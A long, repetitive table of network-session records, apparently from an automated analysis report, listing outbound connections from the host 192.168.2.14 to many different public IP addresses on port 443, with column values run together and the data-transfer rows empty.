                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14203192.168.2.143961643.119.240.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14204192.168.2.14534381.157.15.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14205192.168.2.1438998124.148.195.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14206192.168.2.1455402176.84.126.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14207192.168.2.145075884.67.217.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14208192.168.2.143355636.88.80.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14209192.168.2.144815686.152.146.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14210192.168.2.1437594181.70.178.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14211192.168.2.1451270223.193.202.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14212192.168.2.145758672.52.47.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14213192.168.2.144520640.212.150.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14214192.168.2.144448253.64.255.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14215192.168.2.1444016130.150.146.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14216192.168.2.143436074.6.96.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14217192.168.2.1444600210.215.249.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14218192.168.2.1438432124.92.57.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14219192.168.2.143425473.123.7.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14220192.168.2.1445194170.35.40.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14221192.168.2.144242058.52.39.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14222192.168.2.1441836105.250.1.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14223192.168.2.144269452.132.16.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14224192.168.2.1441734116.41.133.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14225192.168.2.1452168147.2.253.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14226192.168.2.1459286222.53.155.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14227192.168.2.1444894106.168.28.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14228192.168.2.1449652147.189.110.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14229192.168.2.1441556199.94.19.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14230192.168.2.1457052208.115.251.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14231192.168.2.1448104144.66.238.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14232192.168.2.1457242176.207.172.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14233192.168.2.1457436168.22.27.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14234192.168.2.144895643.246.39.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14235192.168.2.1460850140.35.131.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14236192.168.2.145185875.142.112.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14237192.168.2.1443530102.208.196.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14238192.168.2.1444894219.241.93.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14239192.168.2.143406093.34.217.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14240192.168.2.145668813.23.253.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14241192.168.2.1454506151.199.176.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14242192.168.2.144912857.98.36.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14243192.168.2.145883419.96.171.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14244192.168.2.1450118129.154.218.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14245192.168.2.143310459.167.73.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14246192.168.2.14376309.15.87.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14247192.168.2.1456900216.16.147.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14248192.168.2.145089217.35.143.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14249192.168.2.1437842123.192.43.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14250192.168.2.145278246.2.21.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14251192.168.2.145435020.6.42.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14252192.168.2.1446472161.110.255.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14253192.168.2.1433150164.168.237.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14254192.168.2.1448642146.209.210.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14255192.168.2.1433968168.172.101.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14256192.168.2.1446978202.229.193.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14257192.168.2.1455846195.99.35.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14258192.168.2.1455988160.203.112.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14259192.168.2.145976465.50.159.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14260192.168.2.1453612219.27.117.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14261192.168.2.1459004170.207.201.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14262192.168.2.145635248.95.177.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14263192.168.2.1446942144.178.186.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14264192.168.2.1451090140.105.15.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14265192.168.2.145251431.248.12.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14266192.168.2.1458286204.185.45.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14267192.168.2.145758667.64.40.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14268192.168.2.143647231.13.62.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14269192.168.2.1459300125.88.144.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14270192.168.2.1437192192.164.112.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14271192.168.2.1439722161.87.49.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14272192.168.2.1453118216.211.62.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14273192.168.2.143682860.29.88.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14274192.168.2.1449962114.88.230.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14275192.168.2.1436446123.175.99.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14276192.168.2.1446068120.210.223.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14277192.168.2.144869836.50.173.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14278192.168.2.1457372157.133.13.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14279192.168.2.145983297.221.128.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14280192.168.2.144486073.216.220.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14281192.168.2.1448040143.202.207.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14282192.168.2.1455752204.115.241.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14283192.168.2.145024627.252.47.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14284192.168.2.144338482.90.23.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14285192.168.2.143765477.63.54.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14286192.168.2.1450044157.80.111.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14287192.168.2.1436862174.122.26.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14288192.168.2.144920479.16.32.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14289192.168.2.144381612.222.128.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14290192.168.2.143506063.182.193.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14291192.168.2.1438256143.58.156.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14292192.168.2.145253847.22.175.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14293192.168.2.143879412.47.222.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14294192.168.2.145722013.218.232.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14295192.168.2.144458445.215.54.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14296192.168.2.143898259.251.223.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14297192.168.2.1440580135.207.120.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14298192.168.2.144702617.88.19.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14299192.168.2.1455434175.42.210.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14300192.168.2.145799093.77.244.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14301192.168.2.144531648.200.67.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14302192.168.2.1454144148.26.178.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14303192.168.2.1449076219.98.213.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14304192.168.2.145692445.251.66.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14305192.168.2.1433598213.123.82.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14306192.168.2.1439290199.149.207.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14307192.168.2.144917890.84.216.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14308192.168.2.144145834.114.3.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14309192.168.2.1454364220.254.22.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14310192.168.2.1442948218.127.99.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14311192.168.2.144531242.229.209.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14312192.168.2.1447860178.96.68.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14313192.168.2.1440700222.231.85.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14314192.168.2.144487674.240.249.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14315192.168.2.144507220.66.172.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14316192.168.2.1438482130.16.74.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14317192.168.2.1437646129.205.149.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14318192.168.2.1457924102.228.174.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14319192.168.2.14375085.36.157.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14320192.168.2.1450524203.250.69.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14321192.168.2.1448386202.174.248.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14322192.168.2.1441702171.30.91.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14323192.168.2.1458824189.14.90.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14324192.168.2.1459680186.180.47.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14325192.168.2.144649868.184.120.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14326192.168.2.144969261.87.121.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14327192.168.2.1434938163.135.139.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14328192.168.2.144661223.107.144.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14329192.168.2.1442948150.192.94.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14330192.168.2.1452480102.86.210.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14331192.168.2.1434564151.195.66.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14332192.168.2.144456248.220.193.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14333192.168.2.145620088.101.102.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14334192.168.2.143436645.128.95.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14335192.168.2.1447022102.56.190.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14336192.168.2.1439212110.50.81.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14337192.168.2.1453622217.163.168.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14338192.168.2.1457974198.239.136.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14339192.168.2.1436408113.75.51.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14340192.168.2.144733640.51.246.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14341192.168.2.144165083.151.195.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14342192.168.2.144224431.148.113.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14343192.168.2.1450930175.245.188.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14344192.168.2.145906867.61.224.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14345192.168.2.1456056159.35.125.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14346192.168.2.145901820.108.199.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14347192.168.2.145457284.157.23.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14348192.168.2.1452304177.147.68.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14349192.168.2.1458214218.136.219.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14350192.168.2.143460290.4.172.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14351192.168.2.1436692152.244.176.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14352192.168.2.145249217.48.189.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14353192.168.2.1447664148.231.153.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14354192.168.2.1440736171.44.11.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14355192.168.2.1445746188.173.206.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14356192.168.2.1438358217.163.121.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14357192.168.2.145696840.223.240.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14358192.168.2.1448438153.219.29.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14359192.168.2.1434456195.165.12.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14360192.168.2.145850089.159.129.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14361192.168.2.1459232179.251.147.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14362192.168.2.146054453.105.87.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14363192.168.2.143278282.194.72.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14364192.168.2.1459438193.27.248.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14365192.168.2.1433268129.53.71.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14366192.168.2.143426075.51.101.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14367192.168.2.1437912108.68.86.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14368192.168.2.1441830210.8.95.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14369192.168.2.1443670170.152.141.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14370192.168.2.1432924185.123.72.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14371192.168.2.1454656100.59.248.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14372192.168.2.1442312157.226.88.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14373192.168.2.1439630143.244.33.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14374192.168.2.145782073.201.3.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14375192.168.2.1454122118.64.58.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14376192.168.2.1437050121.255.45.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14377192.168.2.1460486174.142.215.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14378192.168.2.1440282145.7.10.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14379192.168.2.145750479.17.47.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14380192.168.2.14559464.165.116.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14381192.168.2.14552348.224.110.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14382192.168.2.144723619.232.63.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14383192.168.2.145180831.222.169.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14384192.168.2.14414401.200.239.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14385192.168.2.1442278219.247.159.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14386192.168.2.144391666.246.91.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14387192.168.2.1443234140.113.70.252443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14388192.168.2.145659278.122.197.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14389192.168.2.1453800165.196.253.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14390192.168.2.144275269.32.42.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14391192.168.2.144708068.66.186.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14392192.168.2.1439568121.227.176.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14393192.168.2.1448802131.57.250.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14394192.168.2.1451758124.33.158.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14395192.168.2.143437031.196.165.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14396192.168.2.143904414.108.5.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14397192.168.2.1436264118.17.181.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14398192.168.2.143524427.242.106.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14399192.168.2.1434342173.165.203.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14400192.168.2.14408049.174.197.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14401192.168.2.145740095.245.82.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14402192.168.2.145129664.216.26.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14403192.168.2.1452766152.108.173.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14404192.168.2.143665669.25.33.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14405192.168.2.1444920151.241.98.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14406192.168.2.145252254.146.206.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14407192.168.2.1434498218.109.251.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14408192.168.2.1437876104.223.238.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14409192.168.2.1448096190.104.74.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14410192.168.2.146037819.74.233.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14411192.168.2.143620820.216.177.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14412192.168.2.1449192150.18.154.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14413192.168.2.143466892.235.160.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14414192.168.2.1433378112.19.165.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14415192.168.2.1432816138.225.22.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14416192.168.2.1441872111.81.1.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14417192.168.2.143819417.112.140.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14418192.168.2.144099884.35.253.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14419192.168.2.1449702180.119.60.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14420192.168.2.1441410137.115.40.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14421192.168.2.1455190101.41.192.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14422192.168.2.143504851.44.50.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14423192.168.2.1455652201.251.57.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14424192.168.2.145909864.65.178.167443
